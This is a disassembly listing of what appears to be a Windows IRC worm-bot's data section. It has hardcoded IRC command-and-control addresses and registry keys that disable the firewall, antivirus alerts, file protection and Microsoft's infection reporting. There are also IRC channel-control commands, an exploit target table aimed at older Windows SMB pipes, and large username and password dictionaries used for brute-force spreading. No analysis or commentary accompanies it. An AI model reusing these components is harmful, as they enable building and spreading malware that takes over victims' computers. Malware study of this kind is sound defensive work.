dd 0E766355Ch, 609F0150h, 3FEDB51Ch, 3C08EADFh, 158Ah
dd 22h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
dd 1F91h, 0
dd 0FB7C7A09h, 2CDC194Eh, 36F7AF11h, 6602E7DFh, 23h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
dd 1F91h, 0
dd 0FE607415h, 2CCB084Ch, 36F7AF11h, 6602E7DFh, 23h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
dd 1F91h, 0
dd 0E77D7E0Ah, 6CDC194Eh, 20F8A45Bh, 3C14FB94h, 0F7198Ah
dd 22h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
dd 1F91h, 0
dd 0F1616E1Eh, 2CDC0A56h, 23F0AD13h, 6008A785h, 8Eh, 22h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
dd 1F91h, 0
dd 0E16C7E1Eh, 6CC10C46h, 68FBAA14h, 7C02F99Eh, 16E9188Dh
dd 89E2h, 21h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
dd 1F91h, 0
dd 0F67A770Fh, 2CD51747h, 28FBB11Ah, 3C14E795h, 138Bh
dd 22h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
dd 1F91h, 0
dd 0A23F630Bh, 31834C13h, 3FF6B65Bh, 6008A7B8h, 8Eh, 22h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
dd 1F91h, 0
dd 0F66A690Ah, 6CD3154Dh, 23FBB65Bh, 3C14E795h, 0F7198Ah
dd 22h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
dd 1F91h, 0
dd 0BD61635Dh, 6DD4014Eh, 34FFA31Ah, 7409E0DFh, 86h, 22h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
dd 1F91h, 0
dd 0A23E635Dh, 64CA480Dh, 2FB0A713h, 8EF9Fh, 23h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
dd 1F91h, 0
dd 0A121295Ah, 339C4E10h, 71B0F243h, 0C1h, 23h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
db 90h
db 1Fh, 2 dup(0)
align 10h
dd 0BD3C225Ch, 2C854B12h, 68AFF147h, 56BFC0h, 23h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
db 90h
db 1Fh, 2 dup(0)
align 8
dd 0A6212F5Ah, 36835617h, 70A8EF40h, 24h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
db 90h
db 1Fh, 2 dup(0)
align 10h
dd 0A121295Ah, 339C4E10h, 71B0F243h, 0C1h, 23h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
dd 1F91h, 0
dd 0BD3C225Ch, 2C854B12h, 68AFF147h, 56BFC0h, 23h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
dd 1F91h, 0
dd 0A6212F5Ah, 36835617h, 70A8EF40h, 24h dup(0)
dd 1E000000h, 46E16C7Eh, 663C20Ch, 0B2h, 0
dd 1F91h, 0
dword_43B038 dd 80000002h ; sub_412267+53�r ...
dword_43B03C dd 0C749543Eh, 47E03974h, 2FD39D29h, 6108FB92h, 64EE1086h
; DATA XREF: sub_4120E9+10B�o
; sub_412267+46�o ...
dd 28D7BBDCh, 33969C8h, 45AFC6A9h, 7D73359Bh, 0D2408794h
dd 28A281E4h, 0EC2A7DD1h, 3371992Bh, 89B4169Ch, 0CFB7DA45h
dd 2AE5h, 2Fh dup(0)
db 3 dup(0)
byte_43B13B db 20h ; DATA XREF: sub_4120E9+106�o
; sub_412267+4D�o ...
dd 6FD64248h, 2Ch, 0C1h dup(0)
dd 80000002h
dword_43B44C dd 0C749543Eh, 47E03974h, 2FD39D29h, 6108FB92h, 64EE1086h
; DATA XREF: sub_41D499+2B6�o
dd 28D7BBDCh, 33969C8h, 45AFC6A9h, 7D73359Bh, 0D2408794h
dd 28A281E4h, 0EC2A7DD1h, 3371992Bh, 89B4169Ch, 0CFB7DA45h
dd 2AE5h, 2Fh dup(0)
db 3 dup(0)
off_43B54B dd offset byte_5F6E3F ; DATA XREF: sub_41D499+2CE�o
align 10h
dd 0C2h dup(0)
dd 80000002h
dword_43B85C dd 0C749543Eh, 47E03974h, 2FD39D29h, 6108FB92h, 64EE1086h
; DATA XREF: sub_41D499+2E6�o
dd 28D7BBDCh, 33969C8h, 45AFC6A9h, 7D73359Bh, 0D2408794h
dd 28A281E4h, 0EC2A7DD1h, 3371992Bh, 89B4169Ch, 0CFB7DA45h
dd 2AE5h, 2Fh dup(0)
db 3 dup(0)
byte_43B95B db 24h ; DATA XREF: sub_41D499+2FE�o
dd 46FE664Fh, 0C2h dup(0)
aXs_gx1codil0ip db 'XS.gx1Codil0ipCc./nFVlQ0czp3c.tya/1/ECot5.3LwcH.9DpYh/gAuwv/Xt.Gq'
; DATA XREF: sub_403B2C+2D6A�o
; sub_403B2C+2E4C�o ...
db '/RDubo13ke.r/3.v3N02NvJL/CS42A/Q./FK0K0RIG/.',0
align 4
aYwxiw_hzl400fd db 'yWXIw.hZL400FdRGg.gJVXr0Ildyc1dw01k1ijd/y0gIBrE1rRds10.3Mzo0fIHLX'
; DATA XREF: sub_403B2C+2C45�o
; sub_403B2C+3544�o ...
db '0QK7f./XE83W.gN7RP..D8EN1hFW6.0UWq/O.1n0S31VIJc109Bp4A1stfLz1wtuD'
db '3.zHiud1iQqWq/1Iu5L0BkFVn1',0
align 4
aH08_Drzwx_ db 'h/08./drzWX.',0 ; DATA XREF: sub_403B2C+26F�o
; sub_403B2C+2F2�o ...
align 4
aQo1bf0_b7k40mn db 'qo1bf0.B7k40Mnsrm1FhS.k.',0 ; DATA XREF: sub_40281E+73�o
; sub_40281E+97�o ...
align 4
aIi290eb6g4Ty84 db 'II/290Eb6G4/TY84s/myQpz0',0 ; DATA XREF: sub_403B2C+1143�o
; sub_403B2C+14EC�o ...
align 10h
a68gmpWcesMnsrm db '68gmp/wceS//Mnsrm1FhS.k.',0 ; DATA XREF: sub_403B2C+1194�o
; sub_403B2C+11E8�o ...
align 4
aYuohiGmfzv db 'yUoHi/GMFZv/',0 ; DATA XREF: sub_403B2C+1B8D�o
; sub_403B2C+1C0D�o ...
align 4
aX1pikRo_tl_ db 'X1PIk/rO.TL.',0 ; DATA XREF: sub_403B2C+201C�o
; sub_403B2C:loc_405B65�o ...
align 4
aZrbax_zpsbs_ty db 'ZRbAx.zPSBs.TY84s/myQpz0',0 ; DATA XREF: sub_403B2C+2404�o
; sub_403B2C+2455�o ...
align 4
aG4xsw0ja5mx_ db 'g4XSw0jA5mx.',0 ; DATA XREF: sub_403B2C+72BE�o
; sub_403B2C+72E0�o ...
align 4
aWxbrg_rpy8y_ty db 'wXBrG.Rpy8y.TY84s/myQpz0',0 ; DATA XREF: sub_403B2C+7331�o
; sub_403B2C+73BD�o ...
align 4
aRaMr15qabm1 db 'RA/Mr15qAbm1',0 ; DATA XREF: start+F�o sub_401408+25�o ...
align 4
aPnmnw_7rscg0 db 'PnmNw.7RScG0',0 ; DATA XREF: sub_401477+DC�o
; sub_402190+489�o ...
align 4
aQnqb5Bavh1_mns db 'qnQb5/bavH1.Mnsrm1FhS.k.',0 ; DATA XREF: sub_403B2C+1D21�o
; sub_403B2C:loc_40586B�o ...
align 10h
aFr3nb0ttxid1mn db 'Fr3NB0Ttxid1Mnsrm1FhS.k.',0 ; DATA XREF: sub_418B58+2F6�o
; sub_41D98A+5C1�o
align 4
aIvrum__ltyn0x9 db 'iVRum..LtyN0X9DHH1k06Rd1',0 ; DATA XREF: sub_403B2C+1E00�o
; sub_403B2C:loc_405A78�o ...
align 4
aBsxrm1gm35a0ty db 'BSXRM1GM35a0TY84s/myQpz0',0 ; DATA XREF: sub_41D98A+627�o
align 4
aOpc9a1uprd41iw db 'OPC9A1upRd41IwhIm0ocHBf0',0 ; DATA XREF: sub_403B2C+3DE7�o
; sub_403B2C+3E77�o ...
align 10h
aSmo3c0mcu8j_xf db 'SmO3C0MCu8j.xfK1r.VuQwI.',0 ; DATA XREF: sub_403B2C+3F70�o
; sub_403B2C+3FA9�o ...
align 4
aTovrfYuzfi1mns db 'tOVrF/YuzFI1Mnsrm1FhS.k.',0 ; DATA XREF: sub_403B2C+495B�o
; sub_403B2C+4A3D�o ...
align 4
aM7pC1xaudb1ty8 db 'm7P/c1xaudB1TY84s/myQpz0',0 ; DATA XREF: sub_403B2C+C2B�o
; sub_403B2C+C8A�o ...
align 4
aIazcn0rzRw0xfk db 'iaZcN0Rz/rw0xfK1r.VuQwI.',0 ; DATA XREF: sub_403B2C+D92�o
; sub_403B2C:loc_404967�o ...
align 10h
a8niowW5nrt1 db '8nIOw/w5nRT1',0 ; DATA XREF: sub_403B2C+1220�o
; sub_403B2C+129D�o ...
align 10h
aFr5ye08wltp1mn db 'fr5ye08Wltp1Mnsrm1FhS.k.',0 ; DATA XREF: sub_419B2F+146�o
; sub_419B2F+1ED�o ...
align 4
a8sxng_tdfrt db '8sXNG.tDfrt/',0 ; DATA XREF: sub_403B2C+6920�o
; sub_403B2C+6A0F�o ...
align 4
aI7lwu1uby8a0 db 'i7LwU1UbY8A0',0 ; DATA XREF: sub_403B2C+50F7�o
; sub_403B2C+52D0�o ...
align 4
aCwje81zpyq1_ty db 'CWje81ZpYQ1.TY84s/myQpz0',0 ; DATA XREF: sub_403B2C+649D�o
; sub_403B2C+64D1�o ...
align 4
aXtyre1_rjar_xf db 'XtyrE1.RJaR.xfK1r.VuQwI.',0 ; DATA XREF: sub_403B2C+5A00�o
; sub_403B2C+5AAE�o ...
align 4
a2fulsVpayi0 db '2FUlS/VPAyI0',0 ; DATA XREF: sub_403B2C+57F7�o
; sub_403B2C+58A6�o ...
align 4
aZshqz13bz2w1 db 'ZsHqZ13bZ2w1',0 ; DATA XREF: sub_403B2C+5C20�o
; sub_403B2C+5CCE�o ...
align 4
aJjc1c1nn0bl0ty db 'JJc1c1nn0bL0TY84s/myQpz0',0 ; DATA XREF: sub_403B2C+5E67�o
; sub_403B2C+5F2B�o ...
align 10h
aCkdai0gd9lr_ db 'ckdai0Gd9lr.',0 ; DATA XREF: sub_403B2C:loc_40771D�o
; sub_403B2C+3C36�o ...
align 10h
a75bqq0i7ucw0 db '75bQQ0i7ucW0',0 ; DATA XREF: sub_403B2C+60B5�o
; sub_403B2C+61A9�o ...
align 10h
aIQ db '(I]q',0 ; DATA XREF: sub_41A1C8+C�o
; sub_41D499+346�o
align 4
aRa db '=RA',0 ; DATA XREF: sub_4032F1+4E�o
; sub_410269+19A�o ...
align 10h
aTa db '=TA',0 ; DATA XREF: sub_4032F1+5F�o
; sub_410269+1B9�o ...
align 4
aZ db '=Z\',0 ; DATA XREF: sub_40FFB4+129�o
; sub_41D499+38E�o
align 10h
a8hj db '8HJ',0 ; DATA XREF: sub_4033F0+A0�o
; sub_40FFB4+151�o ...
align 4
aTf db 27h,'TF',0 ; DATA XREF: sub_403B2C+2C96�o
; sub_403B2C+2CEA�o ...
align 10h
aZ_0 db '=Z]',0 ; DATA XREF: sub_403B2C+2D2B�o
; sub_403B2C+2D70�o ...
align 4
dword_43C078 dd 0C546493Dh, 0F52B6Eh ; sub_403B2C+27BB�o ...
dword_43C080 dd 0DA5B5423h, 3D60h ; sub_403B2C+32BF�o ...
dword_43C088 dd 0D84C5223h, 0 ; sub_4033F0+A6�o ...
dword_43C090 dd 0D84C5226h, 0 ; sub_41D499+436�o
dword_43C098 dd 0DA5F5439h, 60h ; sub_41D499+44E�o
dword_43C0A0 dd 0D64B5420h, 0 ; sub_410795+1A�o ...
dword_43C0A8 dd 0C7464E3Ch, 0 ; sub_41015C:loc_4101AF�o ...
dword_43C0B0 dd 0C14A4838h, 56E1376Bh, 0 ; sub_41A1C8+54�o ...
dd 6F6877h, 4F4D535Bh, 4154532Dh, 554E494Dh, 5D53h, 43C204h
dd 43C1F0h, 43C1DCh, 43C1CCh, 43C1B8h, 43C1ACh, 43C1A0h
dd 43C194h, 43C188h, 4352496Dh, 332E3276h, 564441h, 4352496Dh
dd 2E327620h, 64412033h, 636E6176h, 4F426465h, 54h, 6D6F73h
dd 646E6977h, 2E786262h, 657865h, 20425355h, 3F003376h
dd 2D4F4D53h, 0
dd 45h, 43C184h, 1A0Bh, 6D737323h, 6E6Fh, 6D737323h, 736E6Fh
dd 6D737323h, 6B6E6Fh, 6D737323h, 656E6Fh, 0D340h, 64737323h
dd 727370h
dword_43C170 dd 24h ; sub_403B2C+4CA�r ...
dword_43C174 dd 7 ; sub_419B2F+1AC�r ...
dword_43C178 dd 10h dd offset byte_44D6A4
dd offset byte_44D6A4
dd 2A402Ah, 322E3237h, 38312E30h, 322Eh, 352E3237h, 2E322E30h
dd 32h, 322E3237h, 30332E30h, 322Eh, 322E3237h, 30322E30h
dd 37322Eh, 2E31736Eh, 6D617473h, 73756E69h, 74656E2Eh
dd 0
dd 322E3237h, 37332E30h, 3934312Eh, 0
a72_20_54_57666 db '72.20.54.57:6667',0
align 10h
a72_20_38_17666 db '72.20.38.17:6667',0
align 4
a72_20_22_18054 db '72.20.22.180:54080',0
align 4
dd 0D3253A47h, 2C825613h, 45h, 0D3253A47h, 2C845615h, 43h
dd 0D3253A47h, 13h, 0D3253A47h, 0CC525Dh, 0D3253A47h, 74D35609h
dd 0
dword_43C24C dd 0D3253A47h, 7BC60C09h, 23F0EF45h, 85h, 0D3253A47h, 67C6194Bh
; DATA XREF: .text:00439050�o
dd 24AEA35Bh, 7515E6DFh, 0
dword_43C270 dd 255C7325h, 73h ; sub_414983+157�o ...
aSoftwarePoli_0 db 'SOFTWARE\Policies\Microsoft\MRT',0 ; DATA XREF: sub_412267+3EE�o
aDontreportinfe db 'DontReportInfectionInformation',0 ; DATA XREF: sub_412267+3E9�o
align 4
aFirewalloverri db 'FirewallOverride',0 ; DATA XREF: sub_412267+3D8�o
align 4
aFirewalldisabl db 'FirewallDisableNotify',0 ; DATA XREF: sub_412267+3CA�o
align 4
aAntivirusoverr db 'AntiVirusOverride',0 ; DATA XREF: sub_412267+3BC�o
align 4
aAntivirusdisab db 'AntiVirusDisableNotify',0 ; DATA XREF: sub_412267+3AE�o
align 10h
aSoftwareMicr_0 db 'SOFTWARE\Microsoft\Security Center',0 ; DATA XREF: sub_412267+3A7�o
align 8
aSystemContro_0 db 'SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPol'
; DATA XREF: sub_412267+378�o
db 'icy\DomainProfile',0
align 4
aDisablenotific db 'DisableNotifications',0 ; DATA XREF: sub_412267+36B�o
; sub_412267+398�o
align 4
aDonotallowexce db 'DoNotAllowExceptions',0 ; DATA XREF: sub_412267+35A�o
; sub_412267+38A�o
align 4
aEnablefirewall db 'EnableFirewall',0 ; DATA XREF: sub_412267+34D�o
; sub_412267+37D�o
align 10h
aSystemControls db 'SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPol'
; DATA XREF: sub_412267+348�o
db 'icy\StandardProfile',0
align 4
aAutosharewks db 'AutoShareWks',0 ; DATA XREF: sub_412267+33B�o
align 4
aAutoshareserve db 'AutoShareServer',0 ; DATA XREF: sub_412267+32D�o
aSfcscan db 'SFCScan',0 ; DATA XREF: sub_412267+318�o
aSoftwarePolici db 'Software\Policies\Microsoft\Windows NT\Windows File Protection',0
; DATA XREF: sub_412267+30C�o
; sub_412267+31D�o
align 10h
aSfcdisable db 'SFCDisable',0 ; DATA XREF: sub_412267+307�o
align 4
aSizreqbuf db 'SizReqBuf',0 ; DATA XREF: sub_412267+2F9�o
align 4
aSystemCurren_2 db 'SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters',0
; DATA XREF: sub_412267+2F4�o
align 4
aMaxconnectio_0 db 'MaxConnectionsPerServer',0 ; DATA XREF: sub_412267+2DF�o
aSoftwareMicros db 'Software\Microsoft\Windows\CurrentVersion\Internet Settings',0
; DATA XREF: sub_412267+2CC�o
; sub_412267+2E4�o
aMaxconnections db 'MaxConnectionsPer1_0Server',0 ; DATA XREF: sub_412267+2C2�o
align 4
aSystemCurren_1 db 'SYSTEM\CurrentControlSet\Services\Afd\Parameters',0
; DATA XREF: sub_412267+2B2�o
align 4
aDisablerawsecu db 'DisableRawSecurity',0 ; DATA XREF: sub_412267+2AD�o
align 4
aAllowuserrawac db 'AllowUserRawAccess',0 ; DATA XREF: sub_412267+29F�o
align 10h
aLargebuffersiz db 'LargeBufferSize',0 ; DATA XREF: sub_412267+291�o
aTcpmaxdupacks db 'TcpMaxDupAcks',0 ; DATA XREF: sub_412267+27D�o
align 10h
aDefaultttl db 'DefaultTTL',0 ; DATA XREF: sub_412267+26F�o
align 4
aSackopts db 'SackOpts',0 ; DATA XREF: sub_412267+261�o
align 4
aEnablepmtubhde db 'EnablePMTUBHDetect',0 ; DATA XREF: sub_412267+253�o
align 4
aEnablepmtudisc db 'EnablePMTUDiscovery',0 ; DATA XREF: sub_412267+243�o
aTcpwindowsize db 'TcpWindowSize',0 ; DATA XREF: sub_412267+235�o
align 10h
aGlobalmaxtcpwi db 'GlobalMaxTcpWindowSize',0 ; DATA XREF: sub_412267+224�o
align 4
aTcp1323opts db 'Tcp1323Opts',0 ; DATA XREF: sub_412267+213�o
aStricttimewait db 'StrictTimeWaitSeqCheck',0 ; DATA XREF: sub_412267+202�o
align 4
aTcptimedwaitde db 'TcpTimedWaitDelay',0 ; DATA XREF: sub_412267+1F4�o
align 10h
aMaxuserport db 'MaxUserPort',0 ; DATA XREF: sub_412267+1E6�o
aSystemCurren_0 db 'SYSTEM\CurrentControlSet\Services\Tcpip\Parameters',0
; DATA XREF: sub_412267+1E1�o
align 10h
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Control',0 ; DATA XREF: sub_412267+1D1�o
align 4
aWaittokillserv db 'WaitToKillServiceT',0 ; DATA XREF: sub_412267+1C7�o
align 4
a5000 db '5000',0 ; DATA XREF: sub_412267+1C2�o
align 10h
aBan db 'ban',0 ; DATA XREF: sub_412267+1B7�o
aRModeChanB1 db 'r MODE $chan +b $1',0 ; DATA XREF: sub_412267+1B2�o
align 4
aHalfop db 'halfop',0 ; DATA XREF: sub_412267+1A5�o
align 10h
aRModeChanH1 db 'r MODE $chan +h $1',0 ; DATA XREF: sub_412267+1A0�o
align 4
aVoice db 'voice',0 ; DATA XREF: sub_412267+196�o
align 4
aRModeChanV1 db 'r MODE $chan +v $1',0 ; DATA XREF: sub_412267+191�o
align 10h
aOps db 'ops',0 ; DATA XREF: sub_412267+187�o
aRModeChanO1 db 'r MODE $chan +o $1',0 ; DATA XREF: sub_412267+182�o
align 4
aCtc2 db 'ctc2',0 ; DATA XREF: sub_412267+178�o
align 10h
dword_43C760 dd 31242072h, 13A20hdword_43C768 dd 637463h dword_43C76C dd 52502072h, 534D5649h, 31242047h, 13A20haSlap db 'slap',0 ; DATA XREF: sub_412267+15A�o
align 4
aRPrivmsg1Slaps db 'r PRIVMSG $1 slaps for You!!',0 ; DATA XREF: sub_412267+155�o
align 4
aSlaps db 'slaps',0 ; DATA XREF: sub_412267+14B�o
align 4
aRPrivmsg1GodDa db 'r PRIVMSG $1 god damnit,hard bitchslaps for you!!',0
; DATA XREF: sub_412267+146�o
align 10h
dword_43C7E0 dd 0EFFFC481h, 44FFFFh, 43C828hdword_43C7EC dd 42Ah dword_43C7F0 dd 3E8h dword_43C7F4 dd 258h byte_43C7F8 db 0 ; DATA XREF: sub_4128D4+1FA�r
; sub_4128D4+2DB�r
align 4
dd offset aWinxpSp0Sp1 ; "WinXP (SP0+SP1)"
dd 2C6h, 264h, 0
dd 1
dword_43C810 dd 20804h ; sub_4128D4+2F4�o ...
dword_43C814 dd 158h aWinxpSp0Sp1 db 'WinXP (SP0+SP1)',0 ; DATA XREF: .text:0043C7FC�o
aWinnt42kSp0Sp4 db 'WinNT4,2K (SP0-SP4)',0
; ---------------------------------------------------------------------------
loc_43C83C: ; DATA XREF: sub_4128D4+21C�o
; sub_41391C+3CE�o
jmp short near ptr dword_43C840
; ---------------------------------------------------------------------------
align 10h
dword_43C840 dd 0 dword_43C844 dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 0 ; sub_41391C+2EE�o ...
dword_43C858 dd 4B324FC8h, 1D31670h, 475A7812h, 88E16EBFh, 0 ; sub_41391C+27E�o
aSPipeBrowser db '\\%s\pipe\BROWSER',0 ; DATA XREF: sub_4128D4+77�o
align 10h
off_43C880 dd offset byte_44D6A4 ; DATA XREF: .text:004137CA�r
; .text:004137D2�o
dd offset aSystem_0 ; "SYSTEM"
dd offset aAdm ; "adm"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "ADMIN"
dd offset aAdministrator ; "Administrator"
dd offset aAdministrador ; "Administrador"
dd offset aAdministrateur ; "Administrateur"
dd offset aAdministrada ; "Administrada"
dd offset aAdministratoro ; "Administratoro"
dd offset aAdministrado_0 ; "Administrador'"
dd offset aAdministratore ; "Administratore"
dd offset aAdministratori ; "Administratori"
dd offset aAdministration ; "Administration"
dd offset aAdministrators ; "Administrators"
dd offset aManager ; "manager"
dd offset aOwner ; "owner"
dd offset aRoot ; "root"
dd offset aR00t ; "r00t"
dd offset aRdp ; "rdp"
dd offset aBillGates ; "bill gates"
dd offset aGuest_0 ; "guest"
dd offset aDefault_0 ; "default"
dd offset a31337 ; "31337"
dd offset a@_6 ; "!@"
dd offset a@_5 ; "!@#"
dd offset a@_4 ; "!@#$"
dd offset a@_3 ; "!@#$%"
dd offset a@_2 ; "!@#$%^"
dd offset a@_0 ; "!@#$%^&"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset dword_433F14
dd offset off_43D50C
dd offset dword_433F30
dd offset dword_433F38
dd offset a1_0 ; "1"
dd offset aQaz ; "qaz"
dd offset aUsers ; "users"
dd offset aBillgates ; "billgates"
dd offset aMs_user ; "MS_USER"
dd offset aM_4 ; "m$"
dd offset aSecret ; "secret"
dd offset aManager ; "manager"
dd offset aAccess ; "access"
dd offset aAccount ; "account"
dd offset aAccounting ; "accounting"
dd offset aAccounts ; "accounts"
dd offset aBoss ; "BOSS"
dd offset asc_433E88 ; "X"
align 10h
off_43C950 dd offset byte_44D6A4 ; DATA XREF: sub_4135E8+3�r
; sub_4135E8+F�o
dd offset aSystem_0 ; "SYSTEM"
dd offset aAdm ; "adm"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "ADMIN"
dd offset aAdministrator ; "Administrator"
dd offset aAdministrador ; "Administrador"
dd offset aAdministrateur ; "Administrateur"
dd offset aAdministrada ; "Administrada"
dd offset aAdministratoro ; "Administratoro"
dd offset aAdministrado_0 ; "Administrador'"
dd offset aAdministratore ; "Administratore"
dd offset aAdministratori ; "Administratori"
dd offset aAdministration ; "Administration"
dd offset aAdministrators ; "Administrators"
dd offset aAdmin_0 ; "admin"
dd offset aAdmin123 ; "admin123"
dd offset aAdministrato_0 ; "administrator"
dd offset aManager ; "manager"
dd offset aOwner ; "owner"
dd offset aBoss ; "BOSS"
dd offset a31337 ; "31337"
dd offset asc_432D3C ; "x"
dd offset aXxx ; "xxx"
dd offset aXxxx ; "xxxx"
dd offset aXxx_0 ; "xXx"
dd offset a@_4 ; "!@#$"
dd offset a@_3 ; "!@#$%"
dd offset a@_2 ; "!@#$%^"
dd offset a@_0 ; "!@#$%^&"
dd offset a@_1 ; "!@#$%^&*"
dd offset asc_43D468 ; "%"
dd offset asc_43D464 ; "%%"
dd offset asc_43D460 ; "%%%"
dd offset asc_43D458 ; "%%%%"
dd offset asc_43D450 ; "%%%%%"
dd offset a0 ; "0"
dd offset a00 ; "00"
dd offset a000 ; "000"
dd offset a0000 ; "0000"
dd offset a00000 ; "00000"
dd offset a000000 ; "000000"
dd offset a00000000 ; "00000000"
dd offset a007 ; "007"
dd offset a0wn3d ; "0wn3d"
dd offset a0wned ; "0wned"
dd offset a1_0 ; "1"
dd offset a110 ; "110"
dd offset a111 ; "111"
dd offset a111 ; "111"
dd offset a111111 ; "111111"
dd offset a11111111 ; "11111111"
dd offset a11111111 ; "11111111"
dd offset a12 ; "12"
dd offset a121 ; "121"
dd offset a121212 ; "121212"
dd offset a123 ; "123"
dd offset a123123 ; "123123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a12346 ; "12346"
dd offset a123467 ; "123467"
dd offset a1234678 ; "1234678"
dd offset a12346789 ; "12346789"
dd offset a123467890 ; "123467890"
dd offset a1234qwer ; "1234qwer"
dd offset a123abc ; "123abc"
dd offset a123asd ; "123asd"
dd offset a123qwe ; "123qwe"
dd offset a54321 ; "54321"
dd offset a654321 ; "654321"
dd offset a88888888 ; "88888888"
dd offset a31337 ; "31337"
dd offset aAussie ; "aussie"
dd offset dword_433F14
dd offset off_43D50C
dd offset aAaaa ; "AAAA"
dd offset aAsdf ; "asdf"
dd offset aAbcd ; "abcd"
dd offset off_43D30C
dd offset aAbc123 ; "abc123"
dd offset aAbcd ; "abcd"
dd offset aAcademia ; "academia"
dd offset aAcademic ; "academic"
dd offset aAccess ; "access"
dd offset aAccount ; "account"
dd offset aAccounting ; "accounting"
dd offset aAccounts ; "accounts"
dd offset aAnything ; "anything"
dd offset aApache ; "apache"
dd offset aBackdoor ; "backdoor"
dd offset aBillGates ; "bill gates"
dd offset aBlack ; "black"
dd offset aBillgates ; "billgates"
dd offset aCanada ; "Canada"
; ---------------------------------------------------------------------------
mov ah, 0D2h
inc ebx
add [eax-63FFBC2Eh], ch
rol byte ptr [ebx+0], cl
nop
rol byte ptr [ebx+0], cl
test dl, dl
inc ebx
add [edx+edx*8+43h], bh
add [edx+edx*8+43h], dh
add [eax-2Bh], dl
inc ebx
add [eax-2Eh], ch
inc ebx
add [eax-2Eh], ah
inc ebx
add [eax-2Eh], bl
inc ebx
add [edx+edx*8+43h], cl
add [edx+edx*8], bh
inc ebx
add [eax], ch
rol byte ptr [ebx+0], cl
and dl, dl
inc ebx
add [eax], bl
rol byte ptr [ebx+0], cl
adc dl, dl
inc ebx
add [eax], cl
rol byte ptr [ebx+0], cl
add dl, dl
inc ebx
add al, bh
rol dword ptr [ebx+0], 1
push eax
aad 43h
add ah, ch
rol dword ptr [ebx+0], 1
fcom st(1)
inc ebx
add [eax], dh
aas
inc ebx
add ah, dl
rol dword ptr [ebx+0], 1
rcl cl, 1
inc ebx
add [ebx+ebx*2], al
inc ebx
loc_43CB47: ; CODE XREF: .text:0043CB74�j
add ah, cl
rol dword ptr [ebx+0], 1
rcl cl, 43h
add [eax-4FFFBC2Fh], bh
rol dword ptr [ebx+0], 1
test al, 0D1h
inc ebx
add [eax-67FFBC2Fh], ah
rol dword ptr [ebx+0], 1
nop
rol dword ptr [ebx+0], 1
pop eax
aad 43h
add [eax-7FFFBC2Fh], cl
rol dword ptr [ebx+0], 1
jl short loc_43CB47
inc ebx
add [ecx+edx*8+43h], dh
add [ecx+edx*8+43h], ch
add [ecx+edx*8+43h], ah
add [ecx+edx*8+43h], bl
add [ecx+edx*8+43h], dl
add [eax], dl
aad 43h
add [ecx+edx*8+43h], cl
add [ecx+edx*8+43h], al
add [ecx+edx*8], bh
inc ebx
add [eax], dh
rol dword ptr [ebx+0], 1
sub cl, dl
inc ebx
add [eax], ah
rol dword ptr [ebx+0], 1
; ---------------------------------------------------------------------------
dd offset aMs_user ; "MS_USER"
dd offset aMicrosoft ; "microsoft"
dd offset aMachine ; "machine"
dd offset aMacintosh ; "macintosh"
dd offset aMack ; "mack"
dd offset aMs ; "MS"
dd offset aMypass ; "mypass"
dd offset aMypass123 ; "mypass123"
dd offset aMypc ; "mypc"
dd offset aMypc123 ; "mypc123"
dd offset aM_3 ; "M$"
dd offset aMysql ; "mysql"
dd offset aMssql ; "mssql"
dd offset aMyvps ; "myvps"
dd offset aMypc ; "mypc"
dd offset aNull_1 ; "NULL"
dd offset aOwn ; "own"
dd offset aOwned ; "owned"
dd offset aOwner ; "owner"
dd offset aPass_0 ; "pass"
dd offset aPass123 ; "pass123"
dd offset aPass1234 ; "pass1234"
dd offset aPasswd ; "passwd"
dd offset aPassword ; "password"
dd offset aPassword_0 ; "PASSWORD"
dd offset aPassword_1 ; "Password"
dd offset aPassword1 ; "password1"
dd offset aPassword123 ; "password123"
dd offset aPw ; "pw"
dd offset aPw123 ; "pw123"
dd offset aPwd ; "pwd"
dd offset aPimp ; "pimp"
dd offset aPorn ; "porn"
dd offset dword_433F38
dd offset aQaz ; "qaz"
dd offset aQwe ; "qwe"
dd offset aQwer ; "qwer"
dd offset aQwert ; "qwert"
dd offset aQwerty ; "qwerty"
dd offset aRdp ; "rdp"
dd offset aR00t ; "r00t"
dd offset aRemote ; "remote"
dd offset aRoot ; "root"
dd offset aRooted ; "rooted"
dd offset aTest ; "Test"
dd offset aTest123 ; "test123"
dd offset aTester ; "tester"
dd offset aTesting ; "testing"
dd offset aTrojan ; "trojan"
dd offset aUser1 ; "user1"
dd offset aUsermane ; "usermane"
dd offset aUsername ; "username"
dd offset aUserpassword ; "userpassword"
dd offset aSa ; "sa"
dd offset aSatan ; "satan"
dd offset aSchool ; "school"
dd offset aScorpion ; "scorpion"
dd offset aSecurity ; "security"
dd offset aSuper ; "super"
dd offset aSuperuser ; "superuser"
dd offset aSupport ; "support"
dd offset aSys ; "sys"
